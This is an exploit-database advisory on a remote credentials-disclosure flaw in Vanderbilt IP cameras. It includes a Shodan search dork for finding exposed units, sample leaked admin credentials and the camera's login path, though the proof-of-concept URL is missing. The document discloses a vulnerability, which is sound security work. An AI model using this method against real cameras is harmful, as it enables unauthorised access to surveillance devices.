Vanderbilt IP Camera CCPW3025-IR / CVMW3025-IR - Credentials Disclosure

ID 1337DAY-ID-25274
Type zdt
Reporter Yakir Wizman
Modified 2016-08-19T00:00:00


Exploit for cgi platform in category web applications

                                            1. Advisory Information
Title                   : Vanderbilt IP-Camera (CCPW3025-IR + CVMW3025-IR) Remote Credentials Disclosure
Vendor Homepage         :
Remotely Exploitable    : Yes
Tested on Camera types  : CCPW3025-IR , CVMW3025-IR
Product References      :
+                       :
Vulnerability           : Username / Password Disclosure (Critical/High)
Shodan Dork             : title:"Vanderbilt IP-Camera"
Date                    : 19/08/2016
Author                  : Yakir Wizman (
This vulnerability was identified during penetration test by Yakir Wizman.
3. Description
Vanderbilt IP-Camera (CCPW3025-IR + CVMW3025-IR) allows to unauthenticated user disclose the username & password remotely by simple request which made by browser.
4. Proof-of-Concept:
Simply go to the following url:
Should return some javascript variable which contain the credentials and other configuration vars:
var Adm_ID="admin"; var Adm_Pass1=“admin”; var Adm_Pass2=“admin”; var Language=“en”; var Logoff_Time="0"; 
Login @ http://host:port/cgi-bin/chklogin.cgi
Contact the vendor for further information regarding the proper mitigation of this vulnerability.

# [2018-01-09]  #